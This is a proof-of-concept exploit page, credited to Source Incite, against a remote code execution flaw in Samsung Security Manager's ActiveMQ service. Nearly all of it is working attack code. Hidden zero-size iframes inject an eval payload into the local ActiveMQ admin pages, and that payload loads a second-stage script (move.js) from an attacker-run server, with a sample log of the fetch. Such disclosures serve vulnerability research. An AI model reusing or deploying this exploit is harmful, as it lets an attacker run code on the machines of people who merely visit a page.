<html>
<body>
<script>

/*

Samsung Security Manager ActiveMQ Service MOVE Method Remote Code Execution Vulnerability
SRC: SRC-2016-0031
Found by: Steven Seeley of Source Incite
Thanks to: Shreevatsa for the clever JS tricks

Example:
========

saturn:~ mr_me$ python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1235 ...
172.16.175.186 - - [22/Aug/2016 10:05:49] "GET / HTTP/1.1" 200 -
172.16.175.186 - - [22/Aug/2016 10:05:52] code 404, message File not found
172.16.175.186 - - [22/Aug/2016 10:05:52] "GET /favicon.ico HTTP/1.1" 404 -
172.16.175.186 - - [22/Aug/2016 10:05:52] code 404, message File not found
172.16.175.186 - - [22/Aug/2016 10:05:52] "GET /favicon.ico HTTP/1.1" 404 -
172.16.175.186 - - [22/Aug/2016 10:05:53] "GET /move.js HTTP/1.1" 200 -

*/

function fire() {
  var a = document.createElement('script');
  a.type = 'text/javascript';
  a.src = 'http://172.16.175.1:1235/move.js';  // you will need to change this
  document.body.appendChild(a);
};

var code = fire.toString() + ";fire();";
var evalCode = 'eval("' + code + '")';
var if1 = document.createElement("iframe");
if1.src = 'http://localhost:8161/admin/browse.jsp?JMSDestination="%2b' + evalCode + '%2b"';
if1.width = 0;
if1.height = 0;
document.body.appendChild(if1);

</script>
<script>

window.onload = function() {
  var if2 = document.createElement("iframe");
  if2.src = "http://localhost:8161/admin/queueGraph.jsp"
  if2.width = 0;
  if2.height = 0;
  document.body.appendChild(if2);
};

</script>
</body>
</html>

